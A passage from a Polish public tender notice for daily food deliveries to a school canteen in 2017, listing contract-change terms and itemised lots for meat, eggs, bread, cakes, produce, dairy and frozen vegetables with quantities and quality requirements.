              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Dopuszcza się zmiany w ilościach poszczególnych środków spożywczych określonych w formularzach cenowych w przypadku zmniejszenia lub zwiększenia się liczby osób korzystających ze stołówki szkolnej.
2.	Zamawiający nie będzie zobowiązany do zakupu pełnego asortymentu w podanych ilościach.
3.	Zamawiający zastrzega sobie prawo do zwiększenia ilości dostaw wg asortymentu podanego w ofercie w trakcie realizacji umowy - według własnych potrzeb do limitu posiadanych środków finansowych.
4.	Zmiana wynagrodzenia Wykonawcy określona w oparciu o ceny jednostkowe produktów przedstawione  przez Wykonawcę w formularzach cenowych może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT. Wówczas wynagrodzenie należne Wykonawcy podlegać będzie automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującej w chwili powstania obowiązku podatkowego. 
5.	Za zgodą zamawiającego dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS.
6.	Za zgodą zamawiającego, na pisemny wniosek Wykonawcy cena jednostkowa może być waloryzowana w okresie obowiązywania umowy dwa razy w ciągu roku do wysokości wskaźnika wzrostu cen towarów i usług konsumpcyjnych  opublikowanego przez Główny Urząd Statystyczny na stronie internetowej www.stat.gov.pl. 
7.	Ceny jednostkowe produktów Wykonawca może obniżyć w każdym momencie obowiązywania umowy bez wymagalności zawierania aneksu do umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>MIĘSO I PRZETWORY<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> 1.	Przewidywana częstotliwość dostaw :  codziennie  od poniedziałku do piątku  nie później niż do godz. 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.  
3.	Szczegóły dotyczące ilości i asortymentu dostaw dziennych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty należy dostarczać w pojemnikach z materiałów dopuszczonych do kontaktu z żywnością, zamkniętych i oplombowanych w sposób
sortyment produktów winien być dostarczony w oddzielnym pojemniku.
5.	Okres przydatności do spożycia dla mięsa winien wynosić nie mniej niż 5 dni od daty dostawy do magazynu Zamawiającego.  
6.	Okres przydatności do spożycia wędlin winien wynosić w dniu dostawy do magazynu zamawiającego nie mniej niż  9/10  gwarancji określonej przez producenta.
7.	Do każdego pojemnika powinna być dołączona etykieta zawierająca co najmniej następujące dane:
-  nazwę produktu,
-  termin przydatności do spożycia,
-  nazwę dostawcy  producenta, adres,
-  warunki przechowywania,
-  oznaczenie partii produkcyjnej,
-  oraz pozostałe informacje zgodne z aktualnie obowiązującymi przepisami.

1	Boczek surowy wieprzowy	kg	30
2	Kurczak cały surowy	kg	400
3	Karkówka b/k wieprzowa	kg	100
4	Łopatka b/k wieprzowa	kg	600
5	Szynka gotowana	kg	60
6	Filet królewski	kg	50
7	Szynka wieprzowa b/k	kg	290
8	Żeberka wieprzowe	kg	180
9	Filet drobiowy(mięso świeże nie mrożone, wyselekcjonowane z piersi kurczaka)	kg	300
10	Porcja rosołowa (mięso świeże nie mrożone, korpus kurczaka pozostały po wytrybowaniu mięsa)	kg	250
11	Podudzie z kurczaka  mięso świeże nie mrożone	kg	350
12	Udziec z kurczaka mięso świeże	kg	350
13	Szynka wiejska	kg	50
14	Kiełbasa cienka  bez konserwantów, produkt z mięsa wieprzowego i wołowego w osłonkach parzony i wędzony bez dodatków białkowych, utleniaczy i środków chemicznych 	kg	70
15	Pieczeń myśliwska 	kg	60
16	Kiełbasa krakowska	kg	70
17	Pieczeń wieprzowa	kg	60
18	Ogonówka produkt wieprzowy wędzony parzony biodrówka b/k 75%	kg	200
19	Łopatka wędzona	kg	200
20	Parówki z szynki 90% mięsa bez konserwantów, bez dodatków białkowych, utleniaczy i środków chemicznych	kg	180
21	Polędwica drobiowa 	kg	200
22	Polędwiczki wieprzowe odtłuszczone	kg	50
23	Kiełbasa szynkowa tradycyjna parzona 	kg	200
24	Wołowina bez kości wyselekcjonowane z części udźca bez ścięgien i tkanki tłuszczowej	kg	200
25	Kabanosy 	kg	60
26	Smalec w kostce (200g)	szt.	150
27	Kiełbas krakowska podsuszana	kg	50
28	Schab środkowy bez kości	kg	250
29	Kiełbasa żywiecka	kg	50
30	Pasztet wieprzowy	kg	50
31	Polędwica sopocka	kg	150
32	Schab pieczony 	kg	150
33	Filet z indyka (mięso świeże nie mrożone, wyselekcjonowane z piersi indyka)	kg	50
35	Szynka wędzona 	kg	200
35	Indyk faszerowany	kg	60
36	Kiełbasa cienka podwawelska 	kg	60
37	Słonina wieprzowa	kg	30
38	Kości  wieprzowe schabowe I gat. 	kg	250

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>JAJA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przewidywana częstotliwość dostaw codziennie od poniedziałku do piątku  nie później niż do godziny 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym. Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły, dotyczące ilości dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych, tworzonych na bieżąco, według potrzeb Zamawiającego.
4.	Termin przydatności do spożycia nie krótszy niż 25 dni.

1	Jaja świeże  L  63g	szt.	5000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03142500-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>PIECZYWO<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> 1.	Przewidywana częstotliwość dostaw: codziennie:  poniedziałek  piątek,  nie później niż do godz. 6.30 rano. 
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły  dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.

1.	Chleb pszenny  500g gat. I
Wymagania klasyfikacyjne: struktura i konsystencja  podłużny lub okrągły bochenek, skórka gładka lub lekko chropowata, błyszcząca, barwa: skórki  brązowa do ciemnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności,
smak i zapach  aromatyczny swoisty dla rodzaju chleba 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, chleb o skórce oddzielającej się od miękiszu, zabrudzony, spalony, niedopieczony, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia,
zawilgocenie,  uszkodzenia mechaniczne, bochenki zdeformowane, zgniecione porozrywane obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania bochenków	szt.	1500
2.	Chleb razowy  500g gat. I
Wymagania klasyfikacyjne: struktura i konsystencja  podłużny lub okrągły bochenek, skórka gładka lub lekko chropowata, błyszcząca, barwa: skórki  brązowa do ciemnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności,
smak i zapach  aromatyczny swoisty dla rodzaju chleba 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, chleb o skórce oddzielającej się od miękiszu, zabrudzony, spalony, niedopieczony, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia,
zawilgocenie,  uszkodzenia mechaniczne, bochenki zdeformowane, zgniecione porozrywane obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania bochenków
	szt.	500
3.	Chleb graham 400g  gat. I
Wymagania klasyfikacyjne: struktura i konsystencja  podłużny lub okrągły bochenek, skórka gładka lub lekko chropowata, błyszcząca, barwa: skórki  brązowa do ciemnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności,
smak i zapach  aromatyczny swoisty dla rodzaju chleba 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, chleb o skórce oddzielającej się od miękiszu, zabrudzony, spalony, niedopieczony, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia,
zawilgocenie,  uszkodzenia mechaniczne, bochenki zdeformowane, zgniecione porozrywane obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania bochenków	szt.	100
4.	Chleb pełnoziarnisty 400g  gat. I
Wymagania klasyfikacyjne: struktura i konsystencja  podłużny lub okrągły bochenek, skórka gładka lub lekko chropowata, błyszcząca, barwa: skórki  brązowa do ciemnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności,
smak i zapach  aromatyczny swoisty dla rodzaju chleba 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, chleb o skórce oddzielającej się od miękiszu, zabrudzony, spalony, niedopieczony, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia,
zawilgocenie,  uszkodzenia mechaniczne, bochenki zdeformowane, zgniecione porozrywane obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania bochenków	szt.	100
5.	Bułka tarta 1kg	szt.	150
6.	Bułka zwykła 100g gat. I 
Wymagania klasyfikacyjne: produkt  pieczywo spożywcze, produkowane z mąki pszennej,, struktura i konsystencja  podłużna lub okrągła bułka, z poprzecznym podziałem lub bez, skórka gładka, błyszcząca, lekko chropowata w miejscu podziału, barwa skórki  złocista do jasnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności, sprężysty, równomiernie porowaty smak i zapach  aromatyczny swoisty dla tego rodzaju bułek
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, bułki o skórce oddzielającej się od miękiszu, zabrudzone, spalone, niedopieczone, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia, zawilgocenie, uszkodzenia mechaniczne, bułki zdeformowane, zgniecione 	szt.	7000
7.	Bułka graham 80 gat. I 
Wymagania klasyfikacyjne: produkt  pieczywo spożywcze, produkowane z mąki pszennej,, struktura i konsystencja  podłużna lub okrągła bułka, z poprzecznym podziałem lub bez, skórka gładka, błyszcząca, lekko chropowata w miejscu podziału, barwa skórki  złocista do jasnobrązowej, której intensywność na przekroju maleje w kierunku miękiszu, miękisz  równomiernie zabarwiony, suchy w dotyku o dobrej krajalności, sprężysty, równomiernie porowaty smak i zapach  aromatyczny swoisty dla tego rodzaju bułek
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, kwaśny, zbyt słony, niesłony, stęchły, mdły, zanieczyszczenia mechaniczne, bułki o skórce oddzielającej się od miękiszu, zabrudzone, spalone, niedopieczone, o wyraźnie niewłaściwej porowatości, o miękiszu lepkim, z zakalcem, kruszącym się, z obecnością grudek mąki lub soli, objawy pleśnienia, psucia, zawilgocenie, uszkodzenia mechaniczne, bułki zdeformowane, zgniecione	szt.	7000

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b> CIASTA <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przewidywana częstotliwości dostaw:  codziennie od poniedziałku do piątku najpóźniej do godz. 8.00 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże,  zgodne z obowiązującymi normami.

1	Drożdżówki z budyniem  80g	szt.	800
2	Pączki z marmoladą 70g	szt.	1500
3	Ciasto drożdżowe 1kg	szt.	60
4	Rożki z jabłkiem  70g	szt.	800
5	Drożdżówka z serem 80g	szt.	800
6	Drożdżówka z owocami 80g	szt.	800
7	Makowiec 500g 	szt.	120
8	Keks 500g	szt.	120
9	Sernik 500g	szt.	120
10	Szarlotka 500g	szt.	30

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15812000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>OWOCE I WARZYWA<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przewidywana częstotliwość dostaw:  :  codziennie od poniedziałku do piątku najpóźniej do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi  normami.

1	Banan - całe bez żadnych ubytków i uszkodzeń powstałych podczas wzrostu, zbioru i pakowania, bez śladów gnicia owoc musi być czysty, świeży bez obcych zapachów lub smaków każdy owoc winien być równej długości o żółtym kolorze skóry i białym miąższu. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	500
2	Buraki - średniej wielkości, zdrowe, czyste, jędrne bez objawów gnicia i zepsucia	kg	200
3	Cebula - sucha średniej wielkości bez objawów gnicia, jędrna	kg	120
4	Gruszki  kl. I nie mogą być podziurawione bez ubytków i uszkodzeń powstałych podczas wzrostu i transportu 
Równej wielkości. Owoc nie może być robaczywy, bez obcych zapachów.	kg	150
5	Kiwi - zdrowe nie uszkodzone, jędrne o zdrowym zielonym miąższu kl. 1.  Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	100
6	Kapusta czerwona - średniej wielkości, nie uszkodzona o świeżym wyglądzie bez objaw gnicia lub zepsucia	kg	180
7	Kapusta biała - główki, zdrowe nie uszkodzone o świeżym wyglądzie bez objaw gnicia lub zepsucia 	kg	200
8	Kapusta kiszona - dobrej jakości, bez smaku goryczki	kg	300
9	Kapusta pekińska - zdrowa, nie uszkodzona o świeżym wyglądzie bez objaw gnicia lub zepsucia 	kg	170
10	Marchew - czysta, zdrowa, jędrna, barwa czerwono-pomarańczowa, obcinana, nie popękana, średniej wielkości bez uszkodzeń	kg	400
11	Mandarynki  świeże. Wolne od uszkodzeń i skaleczeń kl. 1.   Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	100
12	Natka pietruszki pęczki - świeża w pęczkach bez objawów gnicia czysta i wolna od jakichkolwiek zanieczyszczeń  obcych	szt.	160
13	Ogórki kiszone - dobrej jakości bez objaw pleśni, twarde	kg	120
14	Ogórek świeży - zdrowy twardy, bez uszkodzeń bez objawów gnicia lub zepsucia.  musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	350
15	Pomidor - średniej wielkości nie uszkodzony i twardy. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni.	kg	360
16	Pieczarki - świeże, średniej wielkości, czyste, biała bez objaw gnicia i zbrązowiałym trzonie	kg	160
17	Sałata lodowa - świeża, główki bez objawów gnicia, zwiędnięcia lub zepsucia.	szt.	100
18	Pietruszka korzeń - obcinana, średniej wielkości, korzenie zdrowe czyste nie uszkodzone	kg	70
19	Pomarańcza - zdrowa, świeża nie uszkodzona  bez odgnieceń lub skaleczeń  równej wielkości Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	150
20	Por - czysty, zdrowy, cały bez objaw gnicia o świeżym wyglądzie	szt.	30
21	Seler korzeniowy - zdrowy, cały, obcinany, średniej wielkości, miąższ biały, bez szkodników	kg	200
22	Sałata - świeża, główki bez objawów gnicia, zwiędnięcia lub zepsucia	szt.	200
23	Szczypiorek pęczki - świeży, czysty bez jakichkolwiek zanieczyszczeń w pęczkach.	szt.	150
24	Rzodkiewka pęczki - świeża, jędrna, średniej wielkości w pęczkach, bez objaw gnicia.  Warzywo musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni.	szt.	250
25	Cytryny - kl. 1 świeży, zdrowy owoc bez zanieczyszczeń i uszkodzeń, żółty  	kg	50
26	Koperek świeży pęczki - świeży w pęczkach bez objawów gnicia czysty i wolny od jakichkolwiek zanieczyszczeń  obcych.	szt.	160
27	Nektarynka - świeża bez  uszkodzeń, bez odgnieceń owoc słodki w smaku o miękkim i soczystym miąższu, równej wielkości kl. 1. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	50
28	Przecier ogórkowy 400g	szt.	240
29	Szczaw konserwowy 270g	szt.	140
30	Arbuz gat. I  czysty, jędrny niepopękany, świeży. Bez jakichkolwiek zanieczyszczeń obcych	kg	150
31	Jabłka - lobo, kortland, champion, inne  kl. 1, nie mogą być podziurawione bez ubytków i uszkodzeń powstałych podczas wzrostu i transportu 
Minimalna średnica 5 cm, równej wielkości Owoc nie może być robaczywy, bez obcych zapachów.	kg	700
32	Brzoskwinia  ładny świeży i twardy owoc bez odgnieceń owoc słodki w smaku o miękkim i soczystym miąższu , równej wielkości kl. 1. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni	kg	50
33	Kalafior świeży - świeży, obcinany, średniej wielkości zdrowy nie uszkodzony o świeżym wyglądzie bez objaw gnicia lub zepsucia	kg	100
34	Kapusta włoska - główka nienaruszona o świeżym wyglądzie bez oznak kwitnienia zdrowa, bez oznak gnicia lub zepsucia.	kg	60
35	Papryka świeża 4 kolory - świeża, zdrowa, jędrna czysta wolna od jakichkolwiek zanieczyszczeń obcych	kg	180
36	Czosnek główki - pałki kompletne, średniej wielkości, nie przerośnięte	kg	3
37	Śliwki - świeże, zdrowe, bez uszkodzeń bez objawów gnicia, zwiędnięcia lub zepsucia. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni.	kg	180
38	Truskawki świeże - zdrowe, czyste, nie uszkodzone. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni.	kg	20
39	Ziemniak bulwa gatunek I.
Odmiana jednorodna  Minimalna średnica bulwy 5 cm.
Opakowanie  worek raszlowy 15 kg Cechy dyskwalifikujące:
objawy gnicia, zmarznięcia, oznaki kiełkowania,  stłuczenia,  obecność szkodników, uszkodzenia przez choroby i szkodniki.	kg	5000
40	Ziemniaki młode bulwa gat.1  od czerwca	kg	200
41	Winogrona - zdrowe, bez uszkodzeń. Owoc musi znajdować się w stanie dojrzałości umożliwiającym przechowywanie go przez okres 5 dni.	kg	30

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03222000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI
                  
                <b>Nazwa: </b>PRODUKTY MLECZARSKIE<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przewidywana częstotliwości dostaw:  codziennie od poniedziałku do piątku najpóźniej do godz. 6.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże,  zgodne z obowiązującymi normami.

1	Masło śmietankowe kostka zaw.tł.min.82% 200g	szt.	1800
2	Mleko spożywcze w folii 1l, 2% mleko pasteryzowane	szt.	1200
3	Śmietana 12% kubek 250ml, bez konserwantów, wartość energetyczna 100g 	szt.	1000
4	Serek wiejski  granulowany 200g	szt.	700
5	Serek homogenizowany naturalny 150g, bez konserwantów	szt.	500
6	Kefir 200g	szt.	50
7	Śmietana 18%tłuszczu świeża bez dodatków i konserwantów 250g	szt.	100
8	Ser twardy żółty gouda	kg	180
9	Ser twardy żółty salami	kg	50
10	Ser biały twaróg półtłusty 3,50% tłuszczu	kg	300
11	Serek kanapkowy 150g	szt.	200
12	Jogurt naturalny 180g	szt.	240
13	Jogurt owocowy 140g	szt.	1000
14	Ser sałatkowy feta 270g	szt.	30
15	Jogurt 7 zbóż owocowy 200g	szt.	700
16	Jogurt pitny truskawka   250g	szt.	700

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15500000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VII
                  
                <b>Nazwa: </b>MROŻONE WARZYWA, OWOCE, POTRAWY<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Przewidywana częstotliwość dostaw  codziennie od poniedziałku do piątku najpóźniej  do godz. 8.30 rano;
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia nie krótszy niż   terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.

1	Bukiet jarzyn z 9 rodzajów warzyw 2kg	szt.	80
2	Fasolka szparagowa zielona mrożona 2kg	szt.	40
3	Kalafior mrożony 1kg	szt.	160
4	Marchew mrożona kostka  1kg	szt.	160
5	Marchew z groszkiem mrożone 1kg	szt.	160
